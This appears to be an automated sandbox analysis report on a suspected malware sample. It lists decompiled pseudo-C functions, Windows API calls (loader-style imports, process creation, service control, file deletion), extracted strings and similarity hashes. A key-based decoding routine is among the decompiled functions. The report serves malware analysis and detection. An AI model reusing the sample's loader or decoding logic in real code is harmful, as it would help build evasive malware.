GetNativeSystemInfo.KERNEL32(?,00023800,00000000,00000000,?,?,?,?,?,?,?,?,10003242,00000000,00000000), ref: 100028DB
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,10003242,00000000,00000000), ref: 10002906

Strings

LoadLibraryA, xrefs: 10002813
GetNativeSystemInfo, xrefs: 10002872
@, xrefs: 10002B0D
VirtualAlloc, xrefs: 10002839
NtFlushInstructionCache, xrefs: 1000285F
GetProcAddress, xrefs: 10002826
VirtualProtect, xrefs: 1000284C

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID: @$GetNativeSystemInfo$GetProcAddress$LoadLibraryA$NtFlushInstructionCache$VirtualAlloc$VirtualProtect
API String ID: 2032221330-3996101490
Opcode ID: e63d525db740d3809d127136d413088c48270fd08407ab415c368e62bba6db1b
Instruction ID: 7dcac8d2a5b8482af36da589395fe626776c8169fc31c26d48e172373dbfcf1e
Opcode Fuzzy Hash: e63d525db740d3809d127136d413088c48270fd08407ab415c368e62bba6db1b
Instruction Fuzzy Hash: 12C19F75A00606DFEB14CF58C980BADB7F1FF45384F698169E845AB349EB34EA81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001083A, Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E1001083A(void* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;
				void* _t36;
				long _t38;
				void* _t39;
				void* _t40;
				long _t51;
				signed char* _t53;
				intOrPtr _t56;
				signed int _t57;
				void* _t61;
				signed int _t68;
				void* _t72;

				_t59 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t72 = __ecx;
				_t1 = _t72 + 0x1c; // 0x1005875c
				_t34 = _t1;
				_v8 = _t34;
				EnterCriticalSection(_t34);
				_t3 = _t72 + 4; // 0x20
				_t56 =  *_t3;
				_t4 = _t72 + 8; // 0x3
				_t68 =  *_t4;
				if(_t68 >= _t56) {
					L2:
					_t68 = 1;
					if(_t56 <= 1) {
						L7:
						_t13 = _t72 + 0x10; // 0x2d407e8
						_t35 =  *_t13;
						_t57 = _t56 + 0x20;
						_t83 = _t35;
						if(_t35 != 0) {
							_t36 = GlobalHandle(_t35);
							_v12 = _t36;
							GlobalUnlock(_t36);
							_t38 = E1000522E(_t59, _t72, __eflags, _t57, 8);
							_t61 = 0x2002;
							_t39 = GlobalReAlloc(_v12, _t38, ??);
						} else {
							_t51 = E1000522E(_t59, _t72, _t83, _t57, 8);
							_pop(_t61);
							_t39 = GlobalAlloc(2, _t51); // executed
						}
						if(_t39 == 0) {
							_t16 = _t72 + 0x10; // 0x2d407e8
							_t72 =  *_t16;
							_t85 = _t72;
							if(_t72 != 0) {
								GlobalLock(GlobalHandle(_t72));
							}
							LeaveCriticalSection(_v8);
							_t39 = E100056F5(_t57, _t61, _t68, _t72, _t85);
						}
						_t40 = GlobalLock(_t39);
						_t18 = _t72 + 4; // 0x20
						_v12 = _t40;
						E10013A90(_t68, _t40 +  *_t18 * 8, 0, _t57 -  *_t18 << 3);
						 *(_t72 + 4) = _t57;
						 *(_t72 + 0x10) = _v12;
					} else {
						_t10 = _t72 + 0x10; // 0x2d407e8
						_t53 =  *_t10 + 8;
						while(( *_t53 & 0x00000001) != 0) {
							_t68 = _t68 + 1;
							_t53 =  &(_t53[8]);
							if(_t68 < _t56) {
								continue;
							}
							break;
						}
						if(_t68 >= _t56) {
							goto L7;
						}
					}
				} else {
					_t5 = _t72 + 0x10; // 0x2d407e8
					if(( *( *_t5 + _t68 * 8) & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t25 = _t72 + 0xc; // 0x3
				if(_t68 >=  *_t25) {
					_t26 = _t68 + 1; // 0x4
					 *((intOrPtr*)(_t72 + 0xc)) = _t26;
				}
				_t28 = _t72 + 0x10; // 0x2d407e8
				 *( *_t28 + _t68 * 8) =  *( *_t28 + _t68 * 8) | 0x00000001;
				_t32 = _t68 + 1; // 0x4
				 *(_t72 + 8) = _t32;
				LeaveCriticalSection(_v8);
				return _t68;
			}

0x1001083a
0x1001083f
0x10010840
0x10010843
0x10010845
0x10010845
0x1001084a
0x1001084d
0x10010853
0x10010853
0x10010856
0x10010856
0x1001085b
0x1001086a
0x1001086c
0x1001086f
0x1001088c
0x1001088c
0x1001088c
0x1001088f
0x10010892
0x10010894
0x100108ac
0x100108b3
0x100108b6
0x100108c4
0x100108ca
0x100108cf
0x10010896
0x10010899
0x1001089f
0x100108a3
0x100108a3
0x100108d7
0x100108d9
0x100108d9
0x100108dc
0x100108de
0x100108e8
0x100108e8
0x100108f1
0x100108f7
0x100108f7
0x100108fd
0x10010903
0x1001090e
0x10010917
0x10010922
0x10010925
0x10010871
0x10010871
0x10010874
0x10010877
0x1001087c
0x1001087d
0x10010882
0x00000000
0x00000000
0x00000000
0x10010882
0x10010886
0x00000000
0x00000000
0x10010886
0x1001085d
0x1001085d
0x10010864
0x00000000
0x00000000
0x10010864
0x10010928
0x1001092b
0x1001092d
0x10010930
0x10010930
0x10010933
0x1001093c
0x1001093f
0x10010942
0x10010945
0x10010951

APIs

EnterCriticalSection.KERNEL32(1005875C,?,?,?,10058740,10058740,?,10010B9D,00000004,10006DFB,10005749,100012B7,1F496801), ref: 1001084D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,10058740,10058740,?,10010B9D,00000004,10006DFB,10005749,100012B7,1F496801), ref: 100108A3
GlobalHandle.KERNEL32(02D407E8), ref: 100108AC
GlobalUnlock.KERNEL32(00000000,?,?,?,10058740,10058740,?,10010B9D,00000004,10006DFB,10005749,100012B7,1F496801), ref: 100108B6
GlobalReAlloc.KERNEL32 ref: 100108CF
GlobalHandle.KERNEL32(02D407E8), ref: 100108E1
GlobalLock.KERNEL32 ref: 100108E8
LeaveCriticalSection.KERNEL32(?,?,?,?,10058740,10058740,?,10010B9D,00000004,10006DFB,10005749,100012B7,1F496801), ref: 100108F1
GlobalLock.KERNEL32 ref: 100108FD
_memset.LIBCMT ref: 10010917
LeaveCriticalSection.KERNEL32(?,1F496801), ref: 10010945

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 9b0fb4173898dca7efad38ccf0bdc09922d9e6414688fdf542b8ca9b31132066
Instruction ID: f17220947a2a2758c08c2aa7655cb3f2e6940147d0428a589c9669a4d5e581bf
Opcode Fuzzy Hash: 9b0fb4173898dca7efad38ccf0bdc09922d9e6414688fdf542b8ca9b31132066
Instruction Fuzzy Hash: 4C31AD71A00705AFE720CF78CC8AA5ABBF9FF44301B118929F896DB651DB71F8918B50

Uniqueness

Uniqueness Score: -1.00%

Function 0473BA2C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,26445C1D), ref: 0473BAF8

Strings

2, xrefs: 0473BA7C
<.#, xrefs: 0473BA98

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID: 2$<.#
API String ID: 963392458-3491762637
Opcode ID: 3c2a5807b2f49b0e2827f103b7ab1b6f82503b6a15dab8673ed5ccabc0516bb4
Instruction ID: 23381dc0e2955c58d33990d8d795af5a3912af595a9a50532af2cc8073622986
Opcode Fuzzy Hash: 3c2a5807b2f49b0e2827f103b7ab1b6f82503b6a15dab8673ed5ccabc0516bb4
Instruction Fuzzy Hash: E721B27280122CBBDF169F95CD0ACDE7F76FF09394F058148FA1962220D3769A64EB90

Uniqueness

Uniqueness Score: -1.00%

Function 04724F6F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 04725020

Strings

[C7, xrefs: 04724F85
w*, xrefs: 04724F8F

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: [C7$w*
API String ID: 1029625771-564491213
Opcode ID: ef326665729df07b3209da68ebeaad9bfe761dd774cd1198dac53405cdc7b4db
Instruction ID: cac01259bb7c43a1e68bf70d71839b2a9e51f0d533ef5e2c9b6c923363d10dc9
Opcode Fuzzy Hash: ef326665729df07b3209da68ebeaad9bfe761dd774cd1198dac53405cdc7b4db
Instruction Fuzzy Hash: 241113B9D0121CBFDB55EBE5D94A8DEBBB4FF10308F008189E921A2211E3B55B548F91

Uniqueness

Uniqueness Score: -1.00%

Function 04735BBD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000), ref: 04735C98

Strings

\%", xrefs: 04735C5C

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: ManagerOpen
String ID: \%"
API String ID: 1889721586-3574504365
Opcode ID: 3fbef4973f4342078fa4b93f1cc564c5885af58c7f9d42e642b2f4bcb4feb99b
Instruction ID: 3899d56995e636f1650dddb40a2f256ea25d1d1b4515e1a6865594b848dff843
Opcode Fuzzy Hash: 3fbef4973f4342078fa4b93f1cc564c5885af58c7f9d42e642b2f4bcb4feb99b
Instruction Fuzzy Hash: E9212471C00219ABEB14CFEADC4989FBBB4FF80304F10809DE42567250D7B55B518F90

Uniqueness

Uniqueness Score: -1.00%

Function 04724100, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetFileInformationByHandle.KERNEL32(00EE4AD0,00000000,?,00000028), ref: 047241CD

Strings

k^u, xrefs: 04724121

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: FileHandleInformation
String ID: k^u
API String ID: 3935143524-3214149818
Opcode ID: e6df4742186b6a1553c8153706f149847fb3046a76656ccbffb9addeeca2aa76
Instruction ID: 6ee930f56397b04fdec265c77fd70dae90c576880cd871749b4c0bf1c8e64371
Opcode Fuzzy Hash: e6df4742186b6a1553c8153706f149847fb3046a76656ccbffb9addeeca2aa76
Instruction Fuzzy Hash: 1E2100B6C0161DEBDF11CFE4D98A8DEBFB4FF08718F108089E914A6291D3B55A249F90

Uniqueness

Uniqueness Score: -1.00%

Function 047426DB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(03F175C7,?,?,?,?,?,?,?,00000000), ref: 04742799

Strings

7w, xrefs: 047426EE

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID: 7w
API String ID: 2591292051-171397026
Opcode ID: 6e1dc2c191aec4beff13919356c777487a7afe485657b76ce9c784418bbe82de
Instruction ID: 7d7ca449611ea8f641b0591c8b4e17679f2e99ad3b8af5f230042f79f1f24eea
Opcode Fuzzy Hash: 6e1dc2c191aec4beff13919356c777487a7afe485657b76ce9c784418bbe82de
Instruction Fuzzy Hash: A91142B5D01319EFDB15DFE8D94A8DEBBB4FF04314F208598E421A6240D7B86B059F84

Uniqueness

Uniqueness Score: -1.00%

Function 04732EF5, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 04732FB1

Strings

], xrefs: 04732F48

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: DeleteFile
String ID: ]
API String ID: 4033686569-636209891
Opcode ID: 4f9751dbd71d5f3299b3ec79b7196f445dc5eac26f51555d5d99352e1d30ff43
Instruction ID: f896afa294b08b68b4f35fc0c50ce3fac528b72ec52e1d75b3b91351d23f5812
Opcode Fuzzy Hash: 4f9751dbd71d5f3299b3ec79b7196f445dc5eac26f51555d5d99352e1d30ff43
Instruction Fuzzy Hash: B71112B5C0162CAFDF05DFA4C94A9EEBFB4FB05319F108188E400B6210D3B41B458F95

Uniqueness

Uniqueness Score: -1.00%

Function 0472B92B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 0472B9E3

Strings

j, xrefs: 0472B985

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID: j
API String ID: 621844428-32252576
Opcode ID: dec89632a3e992566f8b7b614a77279a9f1abb67e74a073da497acca5c334539
Instruction ID: 8fa7c64e94f667d07879980cd48201d656c5fb1b71cc6716822b1602c534fd19
Opcode Fuzzy Hash: dec89632a3e992566f8b7b614a77279a9f1abb67e74a073da497acca5c334539
Instruction Fuzzy Hash: E111CDB5D0020DABDB44DFE5C84AADEBBB0EB24718F108688D421B6255D3B91B48CF91

Uniqueness

Uniqueness Score: -1.00%

Function 047256E8, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(AC61BD64,01F948AD), ref: 047257C2

Strings

W, xrefs: 0472573B

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID: W
API String ID: 1586166983-2402654308
Opcode ID: 7fe8527dd198de4a5eb106a73081553d919630e26445ef576918f4fc94d960a4
Instruction ID: 5ddc3a04e7bf24d9c859e669366217bbe624c87b5d364e31ef31462bd3a81afe
Opcode Fuzzy Hash: 7fe8527dd198de4a5eb106a73081553d919630e26445ef576918f4fc94d960a4
Instruction Fuzzy Hash: 0A2114B6C10209FBDF05DFE4C94A89EBFB1FB04304F108088E525B6260D3B19B54AF80

Uniqueness

Uniqueness Score: -1.00%

Function 10002C04, Relevance: 1.7, APIs: 1, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10002C04(void* __eflags) {
				void* __ebx;
				void* __edi;
				intOrPtr _t77;
				signed int _t78;
				signed int _t84;
				signed int _t101;
				intOrPtr _t108;
				void* _t109;
				signed int _t110;
				signed int _t114;
				signed int _t115;
				void* _t116;
				signed int _t118;
				signed int _t124;
				signed char _t126;
				void* _t150;
				char _t173;
				void* _t174;
				signed int _t175;
				signed int _t180;
				signed int _t184;
				void* _t187;
				signed int _t193;
				intOrPtr _t194;
				signed int _t195;
				intOrPtr _t202;
				void* _t216;
				void* _t218;

				 *(_t218 + 0x1c) =  *(_t218 + 0x1c) & 0x00000000;
				_push(_t109);
				_push(_t174);
				_t77 = E10013020(_t109, _t116, _t174, 0x1258);
				_t175 =  *0x100568f0; // 0x0
				_t184 =  *0x100568f4; // 0x0
				_t110 =  *0x100568ec; // 0x0
				_t118 = _t175 * _t184;
				_t114 =  *0x100568fc; // 0x0
				 *(_t218 + 0x28) = _t118;
				 *(_t218 + 0x14) =  *(_t218 + 0x14) & 0x00000000;
				 *((intOrPtr*)(_t218 + 0x24)) = _t77;
				_t193 = _t184 + _t184 - (_t118 + _t114 + 1) * _t110 - _t114 + _t77;
				_t78 =  *0x100568f8; // 0x0
				 *(_t218 + 0x1c) = _t193;
				 *(_t218 + 0x18) = (_t78 + 2) * _t184 - _t193 - _t114 +  *((intOrPtr*)(_t218 + 0x38));
				while(1) {
					_t84 =  *(_t218 + 0x14);
					_t194 = _t193 + _t84;
					 *( *(_t218 + 0x18) + _t194) = _t84;
					 *((intOrPtr*)(_t218 + 0x20)) = _t194;
					_t195 = 0x2f;
					_t124 = _t84 % _t195;
					 *(_t218 + 0x14) =  *(_t218 + 0x14) + 1;
					_t25 = _t124 + "t$J02fmZ1F!!HKgquWX5Za#HNWguLzINfNUpUqm7UrmoLC"; // 0x304a2474
					 *((char*)( *((intOrPtr*)(_t218 + 0x20)))) =  *_t25;
					if( *(_t218 + 0x14) >= 0x1258) {
						break;
					}
					_t193 =  *(_t218 + 0x1c);
				}
				_t126 =  *0x100568f8; // 0x0
				 *(_t218 + 0x18) = _t184 * _t126;
				 *(_t218 + 0x14) =  *(_t218 + 0x14) & 0x00000000;
				_t30 = _t110 + 2; // 0x2
				_t31 = _t114 + 2; // 0x2
				 *(_t218 + 0x13) = _t110;
				_t202 =  *((intOrPtr*)(_t218 + 0x38));
				 *((intOrPtr*)(_t218 + 0x20)) = _t31 * _t114 - _t30 * _t175 - _t126 +  *(_t218 + 0x18) + _t184 + _t202;
				 *(_t218 + 0x13) =  *(_t218 + 0x13) - (_t110 + 1) * _t126;
				_t101 =  *0x100568f8; // 0x0
				 *((intOrPtr*)(_t218 + 0x30)) = (_t110 - _t114 + 1) * _t175 + _t114 + (_t110 + _t110 - _t114) * _t184 + _t101 * 2 + _t202;
				 *(_t218 + 0x1c) = _t175 * _t101;
				_t48 = _t110 + 1; // 0x1
				 *(_t218 + 0x28) = _t48 * _t175 -  *(_t218 + 0x18) +  *((intOrPtr*)(_t218 + 0x20)) + _t110 + _t101 + _t114 +  *((intOrPtr*)(_t218 + 0x24));
				 *(_t218 + 0x2c) = (_t114 - _t175 - 1) * _t114 -  *(_t218 + 0x2c) * _t101 + _t184 + _t110 * 2 +  *((intOrPtr*)(_t218 + 0x3c));
				_t150 = 2;
				_t216 =  *((intOrPtr*)(_t218 + 0x38)) + (_t150 - _t175 - _t110 - _t114) * _t101 + _t175 * _t175 + _t110 * _t184 - _t184 - _t114 - _t114;
				_t115 =  *(_t218 + 0x14);
				_t180 =  *(_t218 + 0x2c);
				_t187 = (_t184 + 0xfffffffc) * _t110 + (_t114 -  *(_t218 + 0x1c) - _t184) * _t175 - _t184 * _t114 + _t101 + _t184 * _t114 + _t101 +  *((intOrPtr*)(_t218 + 0x38));
				do {
					_t180 = ( *((char*)( *((intOrPtr*)(_t218 + 0x24)) + _t115)) + ( *( *(_t218 + 0x28) + _t115) & 0x000000ff) + _t180) % 0x1258;
					 *((char*)(_t187 + _t115)) =  *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x20)) + _t180));
					_t173 =  *(_t218 + 0x13) +  *((intOrPtr*)(_t115 + _t216));
					_t108 =  *((intOrPtr*)(_t218 + 0x30));
					_t115 = _t115 + 1;
					 *((char*)(_t108 + _t180)) = _t173;
				} while (_t115 < 0x1258);
				return _t108;
			}

0x10002c07
0x10002c0c
0x10002c0f
0x10002c15
0x10002c1a
0x10002c20
0x10002c26
0x10002c2e
0x10002c32
0x10002c38
0x10002c43
0x10002c51
0x10002c57
0x10002c59
0x10002c6a
0x10002c6e
0x10002c78
0x10002c78
0x10002c80
0x10002c82
0x10002c87
0x10002c8d
0x10002c8e
0x10002c90
0x10002c9c
0x10002ca6
0x10002ca8
0x00000000
0x00000000
0x10002c74
0x10002c74
0x10002caa
0x10002cb5
0x10002cb9
0x10002cbe
0x10002cc4
0x10002cd2
0x10002cda
0x10002ce0
0x10002cea
0x10002d04
0x10002d0e
0x10002d17
0x10002d1f
0x10002d37
0x10002d58
0x10002d5c
0x10002d7e
0x10002d90
0x10002da4
0x10002da8
0x10002daf
0x10002dcc
0x10002dd5
0x10002ddc
0x10002dde
0x10002de2
0x10002de3
0x10002de6
0x10002df1

APIs

_malloc.LIBCMT ref: 10002C15

Part of subcall function 10013020: __FF_MSGBANNER.LIBCMT ref: 10013043
Part of subcall function 10013020: __NMSG_WRITE.LIBCMT ref: 1001304A
Part of subcall function 10013020: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,1001B6B8,00000000,00000001,00000000,?,1001A87B,00000018,1002E530,0000000C,1001A90C), ref: 10013097

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 4e524003150933331e86e6507d2e0c056374312aff5aa9456e2ff52e14c5bfdc
Instruction ID: 2d0d6c7d7509f1778fe067b5c77fbbcc0cbf8a289e2d6acd68f5b70733a8447f
Opcode Fuzzy Hash: 4e524003150933331e86e6507d2e0c056374312aff5aa9456e2ff52e14c5bfdc
Instruction Fuzzy Hash: 5551A5316083454FC308DF2DC985546FFE6EFC9214F09D63EE8848B36AEA74D5498B81

Uniqueness

Uniqueness Score: -1.00%

Function 0472554E, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,00000000,?,F8009FDC,00000000), ref: 04725625

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 46e6f42166cbbf26909ec495d65940764ccf3f48b18f3f8b2176570695b90533
Instruction ID: 866e60b488a9d1f7cd6ec898be6e6918728cbb774574f842021fbab051351052
Opcode Fuzzy Hash: 46e6f42166cbbf26909ec495d65940764ccf3f48b18f3f8b2176570695b90533
Instruction Fuzzy Hash: AE21F272801218BFCF15DF95CD498DEBBB5FF89708F018199F925A6220D3B19A20EF90

Uniqueness

Uniqueness Score: -1.00%

Function 04742291, Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,007DE80C), ref: 04742358

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f1cb90980e2c2fe389c435dde86f2da50f7f9d8122bac32300e14d88e190cd3f
Instruction ID: 66e79cbce10c81667e7d9a8d55550a569f984d766a38e30f2b626d999e7d60fe
Opcode Fuzzy Hash: f1cb90980e2c2fe389c435dde86f2da50f7f9d8122bac32300e14d88e190cd3f
Instruction Fuzzy Hash: 77213576D00208FBEF04DFA4C94AADEBBB2EB44314F108099E91466250D7B65B24AB81

Uniqueness

Uniqueness Score: -1.00%

Function 047388BF, Relevance: 1.6, APIs: 1, Instructions: 60serviceCOMMON

Download Yara Rule

APIs

OpenServiceW.ADVAPI32(?,000CC0C9), ref: 0473898E

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 02d89f644e92c0b19dd463d8fa3b0f14e752aeef756131ed66c4487e427c4509
Instruction ID: b7cf4635d3c5afdbd43709596ec12d4fec5ce6f812438d165caff465b75c0353
Opcode Fuzzy Hash: 02d89f644e92c0b19dd463d8fa3b0f14e752aeef756131ed66c4487e427c4509
Instruction Fuzzy Hash: DD2154B2D00218EBDB00DFA5C80AAEEBBB0FF44318F108189E514A2280D7B55B55DF90

Uniqueness

Uniqueness Score: -1.00%

Function 10002251, Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E10002251(intOrPtr __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				void* __ebx;
				intOrPtr* _t14;
				void* _t15;
				intOrPtr* _t21;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr* _t29;
				void* _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t40;

				E10001000(__ecx, __esi);
				asm("int3");
				_t37 =  *((intOrPtr*)(__ecx));
				_t24 =  *((intOrPtr*)(_t37 - 0xc));
				_t38 = _t37 - 0x10;
				_v16 = __ecx;
				_v12 = _t24;
				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 - 0x10)))) + 0x10))(_t33, __esi, _t23, __ecx, __ecx, _t40, 0x8007000e);
				_t32 =  *_t14;
				_t29 = _t14; // executed
				_t15 =  *((intOrPtr*)( *_t14))(_v0, 1); // executed
				_t34 = _t15;
				_t47 = _t34;
				if(_t34 == 0) {
					E10002251(_t29, _t38, _t47);
				}
				_t16 = _a4;
				if(_t24 < _a4) {
					_t16 = _t24;
				}
				_t8 = _t34 + 0x10; // 0x10
				_t25 = _t8;
				E10012D52(_t25, _t38 + 0x10, _t25, _t16 + 1, _t38 + 0x10, _t16 + 1);
				 *((intOrPtr*)(_t34 + 4)) = _v8;
				E100010A3(_t38, _t32);
				_t21 = _v12;
				 *_t21 = _t25;
				return _t21;
			}

0x10002256
0x1000225b
0x10002263
0x10002265
0x10002268
0x1000226b
0x10002273
0x10002276
0x10002279
0x10002280
0x10002282
0x10002284
0x10002286
0x10002288
0x1000228a
0x1000228a
0x1000228f
0x10002294
0x10002296
0x10002296
0x1000229f
0x1000229f
0x100022a3
0x100022b0
0x100022b3
0x100022b8
0x100022bd
0x100022c1

APIs

